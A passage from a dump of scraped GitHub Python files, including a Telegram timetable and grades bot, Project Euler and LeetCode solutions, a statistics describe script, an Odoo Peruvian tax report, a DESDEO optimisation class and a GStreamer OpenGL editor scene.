telebot.types.InlineKeyboardButton(\"R3\", callback_data=\"3\"+day)\n r4 = telebot.types.InlineKeyboardButton('R4', callback_data=\"4\"+day)\n markup.add(r1,r2)\n markup.add(r3,r4)\n kb = types.InlineKeyboardMarkup()\n cid = call.message.chat.id\n mid = call.message.message_id\n bot.edit_message_text(\"Choose Batch....\", cid, mid, 
reply_markup=markup)\n\n\n@bot.callback_query_handler(lambda call: len(call.data) == 3)\ndef foo(call):\n kb = types.InlineKeyboardMarkup()\n cid = call.message.chat.id\n mid = call.message.message_id\n databases = [\"\",\"CSE\",\"ECE\",\"EEE\",\"CIVIL\",\"MME\",\"MINING\",\"ARCHI\"]\n days = [\"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\", \"Sunday\"]\n database = databases[int(call.data[2])]\n print(call.data)\n if int(call.data[2]) == 1 or int(call.data[2]) == 4:\n day = int(call.data[1])\n day = day % 7\n batch = \"R\" + call.data[0]\n ll = \"\" + days[int(day) - 2] + \" \" + batch + \"\\n\"\n ll += \"----------------------------\\n\"\n if int(day) in range(2, 7):\n db = sq.connect(\"localhost\", \"nomad\", \"nomad\", database)\n cursor = db.cursor()\n sql = \"select * from \" + batch\n try:\n cursor.execute(sql)\n res = cursor.fetchall()\n for row in res:\n id = row[0]\n time = row[1]\n sub = row[int(day)]\n ll = ll + \"{time: <8} {sub: <13}\\n\".format(time=time, sub=sub)\n # print(ll, sep=\" \")\n except Exception as e:\n print(\"err\")\n print(e)\n ll = \"Error\"\n\n else:\n ll = \"I guess it's a holiday, right???\"\n # print(message.text[-2:])\n else:\n ll = \"Time - Table is yet to be added....\\nSorry for inconvenience\"\n bot.edit_message_text(ll, cid, mid, reply_markup=kb, parse_mode='HTML')\n # bot.send_message(message.chat.id,ll)\n\n\n'''\n@bot.message_handler(func=lambda message: False) #cause there is no message\ndef saturday_message():\n now = datetime.now()\n me = bot.get_me()+\n if (now.date().weekday() == 5) and (now.time() == time(8,0)):\n bot.send_message(me.id, 'Wake up!')\n\n\n#replying same message\n@bot.message_handler(func=lambda m: True)\ndef echo_all(message):\n\tbot.reply_to(message, message.text)\n'''\n\n@bot.message_handler(commands=[\"set_dept\"])\ndef setdept(message):\n markup = telebot.types.ReplyKeyboardMarkup()#row_width=2\n itembtn2 = telebot.types.KeyboardButton('ECE')\n itembtn1 = telebot.types.KeyboardButton(\"CSE\")\n itembtn3 = telebot.types.KeyboardButton('EEE')\n itembtn4 = telebot.types.KeyboardButton('CIVIL')\n itembtn5 = telebot.types.KeyboardButton('MME')\n itembtn6 = telebot.types.KeyboardButton('MINING')\n itembtn7 = telebot.types.KeyboardButton('ARCHI')\n markup.add(itembtn1)\n markup.add( itembtn2, itembtn3)\n markup.add(itembtn4, itembtn5, itembtn6,itembtn7)\n bot.send_message(message.chat.id, \"Select your Dept.\", reply_markup=markup)\n\n\n@bot.message_handler(regexp=\"BT17CSE0[0-9][0-9]\")\ndef cse(message):\n with open('../data/cse226.template_777.json', 'r') as fp:\n obj = json.load(fp)\n a = []\n for i in range(len(obj)):\n p = []\n p.append(obj[i][\"y1\"])\n p.append(obj[i][\"x1\"])\n p.append(obj[i][\"y2\"])\n p.append(obj[i][\"x2\"])\n a.append(p)\n z = message.text[-2:]\n k = int(z) + 146\n print(k)\n df = read_pdf('../data/cse.pdf', pages=k, area=a, multiple_tables=True, guess=False)\n name = df[6][2][0]\n enroll = df[6][5][0]\n bot.send_message(message.chat.id,name + \"\\n\" + enroll + '\\n')\n df = read_pdf('../data/cse.pdf', pages=k, area=a[3], guess=False,\n pandas_options={'names': ['Code', 'Course', 'Credits', 'Grade']})\n for i in range(len(df)):\n d = \"Code: \" + df['Code'][i] + \"\\n\" + \"Course: \" + df['Course'][i] + '\\n' + \"Credits: \" + str(\n df['Credits'][i].item()) + \"\\n\" + \"Grade: \" + df['Grade'][i]\n bot.send_message(message.chat.id,d + '\\n')\n df = read_pdf('../data/cse.pdf', pages=k, area=a[0], guess=False, pandas_options={'header': None})\n cg = df[6][1]\n sg = 
df[3][1]\n c_cre = df[7][3]\n s_cre = df[3][3]\n s_cre = s_cre[5:]\n c_cre = c_cre[5:]\n print(s_cre + c_cre + sg + cg)\n bot.send_message(message.chat.id,\"Semester Credits: \" + s_cre + \"\\nTotal Credits: \" + c_cre)\n bot.send_message(message.chat.id,'SGPA: ' + sg + '\\nCGPA: ' + cg)\n\n\n#replying same message\n\n@bot.message_handler(func=lambda m: True)\ndef echo_all(message):\n # js = message\n bot.reply_to(message, \"I didn't get....\")\n # bot.send_message(message.chat.id,\"List of Commands:\\n/start\\n/pun\\n/help\\n/set_dept\\n/BT17CSE030\")\n help_command(message)\n\n\n\n\n# bot.polling()\n#abc\nbot.polling(none_stop=True)\n","repo_name":"alpha-k911/vnit_bot","sub_path":"telegram/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21431954616","text":"nums = [x for x in range(1000000)]\nnums[1] = 0\nfor i in range(2,len(nums)):\n n = nums[i]\n if n != 0:\n for j in range(i*2,len(nums),i):\n nums[j] = 0\n\nprimes = list(filter(lambda x: x != 0, nums))\nprint(len(primes))\n\n# try first 1000 primes dp strategy\nprev = primes[0]\ncache = [[prev]]\n\nfor p in primes[1:1000]:\n prev += p\n cache[0].append(prev)\n\nfor idx, p in enumerate(primes[:5]):\n row = [i-p for i in cache[idx]]\n cache.append(row)\n\n# print(len(cache))\n# print(len(cache[-1]))\n\nmx = 0\nbest = 0\nstart = 0\nfor i1, row in enumerate(cache):\n for i2, el in enumerate(row):\n z = i2 - i1\n if z > mx:\n if el in primes and el < 1000000:\n mx = z\n start = i1\n best = el\n print(mx,i1,el)\n\nprint('fin')\nprint(mx,best)\n","repo_name":"ethanbond64/Project-Euler","sub_path":"euler_problems/Euler50.py","file_name":"Euler50.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24728710871","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport pandas as pd\nimport sys\n\nclass DataAnalysis(object):\n def __init__(self, path):\n data_raw = pd.read_csv(path).drop(\"Index\", axis = 1)\n self.data = data_raw.copy()\n self.data = self.data.loc[:, self.data.dtypes == \"float64\"]\n self.header = self.data.columns\n self.data = np.array(self.data.T)\n\n def compute_for_columns(self, function):\n row = []\n for col in self.data:\n row.append(function(col))\n return(row)\n\n def col_count(self, column):\n count = 0\n for i in column:\n if not np.isnan(i):\n count += 1\n return(count)\n\n def col_mean(self, column):\n col_sum = 0\n for i in column:\n if not np.isnan(i):\n col_sum += i\n return(col_sum/self.col_count(column))\n\n def col_std(self, column):\n mean = self.col_mean(column)\n return(np.sqrt(self.col_mean(np.square(column-mean))))\n\n def col_filter_nan(self, column):\n new_col = []\n for i in column:\n if not np.isnan(i):\n new_col.append(i)\n return(new_col)\n\n def col_sort(self, column):\n sorted_col = self.col_filter_nan(column)\n for i in range(1, len(sorted_col)):\n j = i-1\n nxt_element = sorted_col[i]\n # Compare the current element with next one\n while (sorted_col[j] > nxt_element) and (j >= 0):\n sorted_col[j+1] = sorted_col[j]\n j=j-1\n sorted_col[j+1] = nxt_element\n return(sorted_col)\n\n def col_min(self, column):\n return(self.col_sort(column)[0])\n\n def col_max(self, column):\n return(self.col_sort(column)[-1])\n\n def col_quantile(self, column, fraction):\n n = self.col_count(column)\n m = fraction*n\n sorted_col = self.col_sort(column)\n if np.floor(m) == m:\n 
return(sorted_col[int(m)])\n        else:\n            return((sorted_col[int(np.floor(m))] + sorted_col[int(np.ceil(m))])/2)\n\n    def col_quantile_25(self, column):\n        return(self.col_quantile(column,0.25))\n\n    def col_median(self, column):\n        return(self.col_quantile(column,0.5))\n\n    def col_quantile_75(self, column):\n        return(self.col_quantile(column,0.75))\n\n    def describe_42(self):\n        data_description = [np.round(self.compute_for_columns(self.col_count), 6),\n                            np.round(self.compute_for_columns(self.col_mean), 6),\n                            np.round(self.compute_for_columns(self.col_std), 6),\n                            np.round(self.compute_for_columns(self.col_min), 6),\n                            np.round(self.compute_for_columns(self.col_quantile_25), 6),\n                            np.round(self.compute_for_columns(self.col_median), 6),\n                            np.round(self.compute_for_columns(self.col_quantile_75), 6),\n                            np.round(self.compute_for_columns(self.col_max), 6)]\n\n        print(pd.DataFrame(data_description, index = [\"Count\",\"Mean\",\"Std\",\"Min\",\"25%\",\"50%\",\"75%\", \"Max\"], columns = self.header))\n\nif __name__ == \"__main__\":\n    path = sys.argv[1]\n    DataAnalysis(path).describe_42()\n","repo_name":"samimhirech/42-logistic-regression","sub_path":"src/describe.py","file_name":"describe.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"9902983000","text":"#SNGSOH004\n#Assignment 5\n#Question2\n\ncost = eval(input(\"Enter the cost (in cents):\\n\"))\n\nif (cost!=0): #As long as the cost is not 0\n    deposit=eval(input(\"Deposit a coin or note (in cents):\\n\"))\n    remainder = cost-deposit\n\n    while (remainder>0): #While there is still money outstanding:\n        deposit+=eval(input(\"Deposit a coin or note (in cents):\\n\"))\n        remainder = cost-deposit\n\n    string = str(abs(remainder)) #Storing the remainder in a string for future string handling\n\n    if(eval(string)>0): #If the value in the string is greater than 0 (person has overpaid)\n        onedollar=\"0\"\n        if(len(string)>2):\n            onedollar = string[:-2] #The amount of $1 bills to be paid back\n        cents = eval(string[-2:])\n        twentyfive = cents//25 #The number of twenty five cents coins to be paid back\n        cents = cents%25 #Reducing the change amount\n        ten = cents//10 #The number of ten cents coins to be paid back\n        cents = cents%10 #Reducing the change amount\n        five = cents//5 #The number of five cents coins to be paid back\n        cents = cents%5 #Reducing the change amount\n        one = cents//1 #The number of one cent coins to be paid back\n\n        print(\"Your change is:\")\n        if(eval(onedollar)>0):\n            print(onedollar+\" x $1\")\n        if(twentyfive>0):\n            print(twentyfive,\"x 25c\")\n        if(ten>0):\n            print(ten,\"x 10c\")\n        if(five>0):\n            print(five,\"x 5c\")\n        if(one>0):\n            print(one,\"x 1c\")","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_5/sngsoh004/question2.py","file_name":"question2.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"26239188904","text":"\"\"\"\"\"\"\nimport pigpio\n\nfrom electricipy.raspi.gpio_controller import GPIOController\n\n\nclass InputController(GPIOController):\n    \"\"\"\"\"\"\n\n    def _initialize_gpio(self):\n        \"\"\" Initialize the GPIO pins. \"\"\"\n        for pin in self._pins:\n            self._pi.set_mode(pin, pigpio.INPUT)\n","repo_name":"obulka/electricipy","sub_path":"electricipy.raspi/src/electricipy/raspi/input_devices/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"2347394538","text":"from django.db import models\n# Create your models here.\nclass slideimage(models.Model):\n    slideimage_name = models.CharField(max_length=50, unique=True)\n    description = models.TextField(max_length=300, blank=True)\n    slideimage_image = models.ImageField(upload_to='photos/slideimages', blank=True)\n\n    class Meta:\n        verbose_name = 'slideimage'\n        verbose_name_plural = 'slideimages'\n\n    def __str__(self):\n        return self.slideimage_name\n","repo_name":"Nasser-Nzlawy/stores","sub_path":"sliderimages/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"36362971622","text":"# the function returns a list containing the prime numbers\n# from 1 up to the entered number inclusive\n# complexity = O(N^2)\n\ndef foo(n):\n    # n - the number\n    res = []\n    for i in range(1, n + 1):\n        divisors = 0\n        j = 2\n        while j < i and divisors == 0:\n            if i % j == 0:\n                divisors += 1\n            j += 1\n\n        if divisors == 0:\n            res.append(i)\n\n    return res\n","repo_name":"dolphin-in-a-coma/python-course","sub_path":"2-9_Rest_subjects/6_Time_complexity/6.2.4.py","file_name":"6.2.4.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"41166303030","text":"class Solution(object):\n    def rob(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: int\n        \"\"\"\n        if len(nums)<1:\n            return 0\n\n        if len(nums)==1:\n            return nums[0]\n\n        curr1,pre1,tmp1=0,0,0\n        curr2,pre2,tmp2=0,0,0\n\n        for i in range(0,len(nums)-1):\n            tmp1 = max(pre1+nums[i],curr1)\n            pre1,curr1 = curr1,tmp1\n\n        curr2,pre2,tmp2=0,0,0\n        for i in range(1,len(nums)):\n            tmp2 = max(pre2+nums[i],curr2)\n            pre2,curr2 = curr2,tmp2\n\n        return max(curr1,curr2)\n\n","repo_name":"abhitrip/scratchpad","sub_path":"LeetCode/pythonSols/houserobber2.py","file_name":"houserobber2.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"4391582026","text":"from odoo import _, api, models\nfrom odoo.exceptions import UserError\n\n\nclass AccountReport(models.Model):\n    _inherit = 'account.report'\n\n    @api.model\n    def _get_options_all_entries_domain(self, options):\n        \"\"\"For sale reports, both cancelled and posted documents must be considered\"\"\"\n        result = super()._get_options_all_entries_domain(options)\n        if self and self != self.env.ref(\"l10n_pe_reports.tax_report_ple_sales_14_1\"):\n            return result\n        return [\"|\", (\"parent_state\", \"=\", \"posted\"), \"&\",\n                (\"parent_state\", \"=\", \"cancel\"), (\"move_id.l10n_pe_edi_cancel_cdr_number\", \"!=\", False)]\n\n\nclass PeruvianTaxPle141ReportCustomHandler(models.AbstractModel):\n    _name = \"l10n_pe.tax.ple.14.1.report.handler\"\n    _inherit = \"l10n_pe.tax.ple.report.handler\"\n    _description = \"PLE Sales Report 14.1\"\n\n    def _get_report_number(self):\n        return \"1401\"\n\n    def export_to_txt(self, options):\n        def format_float(amount):\n            \"\"\"Avoid -0 on TXT report\"\"\"\n            if amount == 0:\n                return abs(amount)\n            return amount\n\n        lines =
self._get_ple_report_data(options, \"move_id\")\n data = []\n period = options[\"date\"][\"date_from\"].replace(\"-\", \"\")\n state_error = []\n for line in lines:\n columns = line[1]\n if columns[\"status\"] == \"posted\" and columns[\"edi_state\"] != \"sent\":\n state_error.append(columns[\"move_name\"])\n continue\n serie_folio = self._get_serie_folio(columns[\"move_name\"])\n serie_folio_related = self._get_serie_folio(columns[\"related_document\"])\n data.append(\n {\n \"period\": \"%s00\" % period[:6],\n \"identificator_type_date\": \"%s\" % line[0],\n \"identificator_correlative\": \"M%s\" % line[0],\n \"invoice_date\": columns[\"invoice_date\"].strftime(\"%d/%m/%Y\") if columns[\"invoice_date\"] else \"\",\n \"date_due\": columns[\"date_due\"].strftime(\"%d/%m/%Y\") if columns[\"date_due\"] else \"\",\n \"document_type\": columns[\"document_type\"],\n \"document_serie\": serie_folio[\"serie\"].replace(\" \", \"\"),\n \"document_number\": serie_folio[\"folio\"].replace(\" \", \"\"),\n \"payment_number\": \"\", # Related payment not implemented yet\n \"customer_id\": columns[\"partner_lit_code\"],\n \"customer_vat\": columns[\"customer_vat\"] or \"\",\n \"customer\": columns[\"customer\"],\n \"base_exp\": format_float(columns[\"base_exp\"]) or \"\",\n \"base_igv\": format_float(columns[\"base_igv\"]) or \"\",\n \"amount_discount\": \"\",\n \"tax_igv\": format_float(columns[\"tax_igv\"]) or \"\",\n \"tax_igv_discount\": \"\",\n \"base_exo\": format_float(columns[\"base_exo\"]) or \"\",\n \"base_ina\": format_float(columns[\"base_ina\"]) or \"\",\n \"tax_isc\": format_float(columns[\"tax_isc\"]) or \"\",\n \"base_ivap\": format_float(columns[\"base_ivap\"]) or \"\",\n \"tax_ivap\": format_float(columns[\"tax_ivap\"]) or \"\",\n \"vat_icbper\": format_float(columns[\"vat_icbper\"]) or \"0.00\",\n \"tax_oth\": \"\",\n \"amount_total\": columns[\"amount_total\"] or \"\",\n \"currency\": columns[\"currency\"],\n \"rate\": \"%.3f\" % abs(columns[\"rate\"]),\n \"emission_date_related\": columns[\"emission_date_related\"].strftime(\"%d/%m/%Y\") if columns[\n \"emission_date_related\"] else \"\",\n \"document_type_related\": columns[\"document_type_related\"] or \"\",\n \"related_document_serie\": serie_folio_related.get(\"serie\", \"\").replace(\" \", \"\"),\n \"related_document_number\": serie_folio_related.get(\"folio\", \"\").replace(\" \", \"\"),\n \"contract_identification_OSIC\": \"\", # Exclusive use of operators of irregular companies, consortia\n \"currency_error\": \"\",\n \"canceled_by_payment\": \"\",\n \"invoice_status\": self._get_document_status(\n columns[\"status\"], columns[\"invoice_date\"], columns[\"date\"]\n ),\n \"final_pipe\": \"\", # this field is only to print a technical closing pipe\n }\n )\n\n if state_error:\n raise UserError(_(\n \"The state in the next documents are posted, but are not present in the SUNAT:\\n\\n%s\") % '\\n'.join(\n state_error))\n\n return self._get_file_txt(options, data)\n\n def _custom_options_initializer(self, report, options, previous_options=None):\n super()._custom_options_initializer(report, options, previous_options=previous_options)\n options['forced_domain'] = [\n *options.get('forced_domain', []),\n (\"move_id.move_type\", \"in\", (\"out_invoice\", \"out_refund\")),\n ]\n\n def _report_custom_engine_ple_14_1(\n self, expressions, options, date_scope, current_groupby, next_groupby, offset=0, limit=None\n ):\n report = self.env[\"account.report\"].browse(options[\"report_id\"])\n report._check_groupby_fields(\n 
(next_groupby.split(\",\") if next_groupby else []) + ([current_groupby] if current_groupby else [])\n )\n\n return self._get_ple_report_data(options, current_groupby)\n","repo_name":"wilsonHarper/enterprise","sub_path":"l10n_pe_reports/models/account_ple_sales_14_1.py","file_name":"account_ple_sales_14_1.py","file_ext":"py","file_size_in_byte":5555,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"20838989852","text":"import copy\nfrom abc import ABC, abstractmethod\nfrom typing import List, Optional, Union\n\nimport numpy as np\n\nfrom desdeo.utils.misc import as_minimized\n\n\nclass MOProblem(ABC):\n \"\"\"\n Abstract base class for multiobjective problem\n\n Attributes\n ----------\n variables : list of Variables\n MOProblem decision variable information\n\n ideal\n Ideal, i.e, the worst values of objective functions\n\n nadir\n Nadir, i.e, the best values of objective functions\n\n maximized\n Indicates maximized objectives\n \"\"\"\n\n def __init__(\n self,\n nobj: int,\n nconst: int = 0,\n ideal: Optional[List[float]] = None,\n nadir: Optional[List[float]] = None,\n maximized: Optional[List[bool]] = None,\n objectives: Optional[List[str]] = None,\n name: str = None,\n points: Optional[List[float]] = None,\n ) -> None:\n self.nobj = nobj\n self.nconst = nconst\n self.variables = [] # type: List[Variable]\n self.ideal = ideal\n self.nadir = nadir\n self.points = points\n if maximized is not None:\n self.maximized = maximized # type: Optional[List[bool]]\n elif self.ideal is not None:\n self.maximized = [False] * len(self.ideal)\n else:\n self.maximized = None\n\n if objectives is None:\n self.objectives = [\"f%i\" % (i + 1) for i in range(self.nobj)]\n else:\n self.objectives = objectives\n self.name = name\n\n if self.ideal and self.nadir and self.maximized:\n self.maximum = self.as_minimized(\n [\n i if m else n\n for i, n, m in zip(self.ideal, self.nadir, self.maximized)\n ]\n )\n self.minimum = self.as_minimized(\n [\n n if m else i\n for i, n, m in zip(self.ideal, self.nadir, self.maximized)\n ]\n )\n\n @abstractmethod\n def evaluate(self, population):\n \"\"\"\n Evaluate the objective and constraint functions for population and return tuple (objective,constraint) values\n\n\n Parameters\n ----------\n population : list of variable values\n Description\n \"\"\"\n\n def objective_bounds(self):\n \"\"\"\n Return objective bounds\n\n\n Returns\n -------\n lower : list of floats\n Lower boundaries for the objectives\n\n Upper : list of floats\n Upper boundaries for the objectives\n\n \"\"\"\n if self.ideal and self.nadir:\n return self.ideal, self.nadir\n raise NotImplementedError(\n \"Ideal and nadir value calculation is not yet implemented\"\n )\n\n def nof_objectives(self) -> Optional[int]:\n if self.ideal and self.nadir:\n assert len(self.ideal) == len(self.nadir)\n return len(self.ideal)\n else:\n return None\n\n def nof_variables(self) -> int:\n return len(self.variables)\n\n def add_variables(\n self, variables: Union[List[\"Variable\"], \"Variable\"], index: int = None\n ) -> None:\n \"\"\"\n Parameters\n ----------\n variable : list of variables or single variable\n Add variables as problem variables\n\n index : int\n Location to add variables, if None add to the end\n\n \"\"\"\n if isinstance(variables, Variable):\n addvars = copy.deepcopy([variables])\n else:\n addvars = copy.deepcopy(variables)\n\n if index is None:\n self.variables.extend(addvars)\n else:\n self.variables[index:index] = addvars\n\n def 
as_minimized(self, v):\n return as_minimized(v, self.maximized)\n\n def bounds(self):\n\n return [v.bounds for v in self.variables]\n\n\nclass PythonProblem(MOProblem):\n pass\n\n\nclass Variable(object):\n \"\"\"\n Attributes\n ----------\n bounds : list of numeric values\n lower and upper boundaries of the variable\n\n name : string\n Name of the variable\n\n starting_point : numeric value\n Starting point for the variable\n \"\"\"\n\n def __init__(self, bounds=None, starting_point=None, name=\"\"):\n \"\"\"\n Constructor\n\n\n \"\"\"\n self.bounds = bounds\n self.starting_point = starting_point\n self.name = name\n\n\nclass PreGeneratedProblem(MOProblem):\n \"\"\" A problem where the objective function values have beeen pregenerated\n \"\"\"\n\n def __init__(self, filename=None, points=None, delim=\",\", **kwargs):\n self.points = []\n self.original_points = []\n if points:\n self.original_points = list(points)\n self.points = list(points)\n elif filename:\n with open(filename) as fd:\n for r in fd:\n self.points.append(list(map(float, map(str.strip, r.split(delim)))))\n self.original_points = list(self.points)\n\n super().__init__(nobj=len(self.points[0]), points=self.points, **kwargs)\n\n if not self.ideal:\n self.ideal = list(np.min(self.points, axis=0))\n if not self.nadir:\n self.nadir = list(np.max(self.points, axis=0))\n\n def evaluate(self, population=None):\n return self.points\n","repo_name":"naricode/InteractiveNautilusBasedAlgorithm","sub_path":"desdeo/problem/Problem.py","file_name":"Problem.py","file_ext":"py","file_size_in_byte":5338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73961044279","text":"__author__ = 'Lubosz Sarnecki'\n\nfrom gi.repository import Graphene, Gdk\nimport numpy\nimport math\nfrom gst_opengl_editor.graphics import *\nfrom numpy import array\n\n\ndef matrix_to_array(m):\n result = []\n for x in range(0, 4):\n result.append([m.get_value(x, 0),\n m.get_value(x, 1),\n m.get_value(x, 2),\n m.get_value(x, 3)])\n return numpy.array(result, 'd')\n\n\nclass Scene():\n def __init__(self):\n self.handles = {}\n self.graphics = {}\n self.width, self.height = 0, 0\n self.init = False\n self.window = None\n\n def relative_position(self, event):\n # between 0 and 1\n x = event.x / self.width\n y = 1.0 - (event.y / self.height)\n\n # between -1 and 1\n return (2 * x - 1,\n (2 * y - 1))\n\n def aspect(self):\n if self.width == 0 or self.height == 0:\n return 1\n return self.width / self.height\n\n def set_cursor(self, type):\n display = Gdk.Display.get_default()\n cursor = Gdk.Cursor.new_for_display(display, type)\n self.window.get_window().set_cursor(cursor)\n\n def reshape(self, sink, context, width, height):\n self.width, self.height = width, height\n if not self.init:\n self.init_gl(context)\n self.init = True\n glViewport(0, 0, width, height)\n return True\n\n def init_gl(self, context):\n glClearColor(0.0, 0.0, 0.0, 0.0)\n glDisable(GL_DEPTH_TEST)\n glEnable(GL_BLEND)\n glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)\n glEnable(GL_TEXTURE_RECTANGLE)\n\n\nclass HandleActor():\n def __init__(self, drag, x=0, y=0):\n self.position = (x, y)\n self.clicked = False\n self.initital_position = self.position\n self.drag = drag\n self.size = 1.0\n\n def is_clicked(self, click):\n vclick = Graphene.Vec2.alloc()\n vclick.init(click[0], click[1])\n vpos = Graphene.Vec2.alloc()\n vpos.init(self.position[0], self.position[1])\n vdistance = vclick.subtract(vpos)\n\n hovered = vdistance.length() < 0.05 * 
self.size\n\n self.hovered = hovered\n\n return hovered\n\n def reposition(self, matrix, aspect):\n vector = numpy.array([self.initital_position[0] * aspect,\n self.initital_position[1], 0, 1])\n vector_transformed = numpy.dot(vector, matrix)\n\n self.position = (vector_transformed[0], -vector_transformed[1])\n\n def distance_to(self, actor):\n distance = array(self.position) - array(actor.position)\n return numpy.sqrt(distance.dot(distance))\n\n def model_matrix(self):\n model_matrix = Graphene.Matrix.alloc()\n\n model_matrix.init_scale(self.size, self.size, 1.0)\n\n translation_vector = Graphene.Point3D.alloc()\n translation_vector.init(self.position[0], self.position[1], 0)\n\n model_matrix.translate(translation_vector)\n\n return matrix_to_array(model_matrix)\n\n\nclass BoxActor():\n def __init__(self, drag):\n self.drag = drag\n\n def is_clicked(self, click, handles):\n\n from shapely.geometry import Point\n from shapely.geometry.polygon import Polygon\n\n point = Point(*click)\n polygon = Polygon([handles[\"1BL\"].position,\n handles[\"2TL\"].position,\n handles[\"3TR\"].position,\n handles[\"4BR\"].position])\n\n return polygon.contains(point)\n\n def get_center(self, handles):\n diagonal = array(handles[\"1BL\"].position) - array(handles[\"3TR\"].position)\n\n center = array(handles[\"3TR\"].position) + diagonal / 2.0\n\n return center\n\n\nclass TransformScene(Scene):\n def __init__(self):\n Scene.__init__(self)\n\n self.corner_handles = {\n \"1BL\": HandleActor(self.scale_keep_aspect, -1, -1),\n \"2TL\": HandleActor(self.scale_keep_aspect, -1, 1),\n \"3TR\": HandleActor(self.scale_keep_aspect, 1, 1),\n \"4BR\": HandleActor(self.scale_keep_aspect, 1, -1)}\n\n self.edge_handles = {\n \"left\": HandleActor(self.scale_height, -1, 0),\n \"right\": HandleActor(self.scale_height, 1, 0),\n \"top\": HandleActor(self.scale_width, 0, 1),\n \"bottom\": HandleActor(self.scale_width, 0, -1)}\n\n self.graphics[\"handle\"] = HandleGraphic(100, 100)\n self.graphics[\"video\"] = VideoGraphic()\n self.graphics[\"box\"] = BoxGraphic(self.corner_handles.values())\n\n self.graphics[\"background\"] = BackgroundGraphic()\n\n self.handles = list(self.corner_handles.values()) \\\n + list(self.edge_handles.values())\n\n self.box_actor = BoxActor(self.translate)\n self.selected = False\n self.slider_box = None\n self.action = None\n\n self.zoom = 1.0\n self.set_zoom_matrix(self.zoom)\n\n def on_scroll(self, sink, event):\n deltas = event.get_scroll_deltas()\n v = self.zoom_slider.get_value()\n if deltas[0]:\n v -= deltas[2] * 0.1 * self.zoom\n self.zoom_slider.set_value(v)\n\n def set_zoom_matrix(self, zoom):\n self.zoom_matrix = Graphene.Matrix.alloc()\n self.zoom_matrix.init_scale(zoom, zoom, 1.0)\n\n def set_zoom(self, scale):\n self.zoom = scale.get_value()\n self.set_zoom_matrix(self.zoom)\n\n self.reposition()\n\n def deselect(self):\n self.selected = False\n # default\n self.set_cursor(Gdk.CursorType.ARROW)\n\n def init_gl(self, context):\n Scene.init_gl(self, context)\n\n cairo_shader = Shader(context, \"simple.vert\", \"cairo.frag\")\n\n self.graphics[\"handle\"].init_gl(\n context, self.width, self.height, cairo_shader)\n self.graphics[\"box\"].init_gl(\n context, self.width, self.height, cairo_shader)\n self.graphics[\"video\"].init_gl(context)\n self.graphics[\"background\"].init_gl(\n context, self.width, self.height, cairo_shader)\n\n self.init = True\n\n def reposition(self):\n\n matrix = numpy.dot(self.slider_box.mvp(), matrix_to_array(self.zoom_matrix))\n\n distance1 = 
self.corner_handles[\"1BL\"].distance_to(self.edge_handles[\"bottom\"])\n distance2 = self.corner_handles[\"2TL\"].distance_to(self.edge_handles[\"left\"])\n\n if distance1 < 0.1 or distance2 < 0.1:\n size = 10.0 * min(distance1, distance2)\n else:\n size = 1.0\n\n for handle in self.handles:\n handle.reposition(matrix, self.aspect())\n handle.size = size\n\n def draw(self, sink, context, video_texture, w, h):\n if not self.init:\n return\n\n context.clear_shader()\n\n glClearColor(0, 0, 0, 1)\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n\n context.clear_shader()\n self.graphics[\"background\"].draw()\n context.clear_shader()\n self.graphics[\"video\"].draw(video_texture, matrix_to_array(self.zoom_matrix))\n context.clear_shader()\n\n if self.selected:\n self.graphics[\"box\"].draw(self.corner_handles)\n self.graphics[\"handle\"].draw_actors(self.handles)\n\n return True\n\n def get_rotation(self, event):\n center = self.box_actor.get_center(self.corner_handles) * array([self.aspect(), 1])\n click = array(self.relative_position(event)) * array([self.aspect(), 1])\n\n distance = click - center\n distance /= numpy.linalg.norm(distance)\n\n axis = array([1, 0])\n\n rot = math.atan2(distance[1], distance[0]) - math.atan2(axis[1], axis[0])\n\n return math.degrees(-rot)\n\n def scale_width(self, event):\n scale_y = self.slider_box.sliders[\"scale-y\"]\n scale_y.set(self.center_distance(event))\n\n def scale_height(self, event):\n scale_x = self.slider_box.sliders[\"scale-x\"]\n scale_x.set(self.center_distance(event))\n\n def center_distance(self, event):\n center = self.box_actor.get_center(self.corner_handles)\n distance = center - array(self.relative_position(event))\n return numpy.sqrt(distance.dot(distance)) / self.zoom\n\n def scale_keep_aspect(self, event):\n old_aspect = self.old_scale[0] / self.old_scale[1]\n scale_x = self.slider_box.sliders[\"scale-x\"]\n scale_y = self.slider_box.sliders[\"scale-y\"]\n distance = self.center_distance(event)\n scale_x.set(old_aspect * distance / math.sqrt(2))\n scale_y.set(distance / math.sqrt(2))\n\n def rotate(self, event):\n rotation = self.slider_box.sliders[\"rotation-z\"]\n rotation.set((self.oldrot + self.get_rotation(event)) % 360)\n\n def translate(self, event):\n pos = array(self.relative_position(event))\n\n # drag cursor\n self.set_cursor(Gdk.CursorType.FLEUR)\n\n x = self.slider_box.sliders[\"translation-x\"]\n y 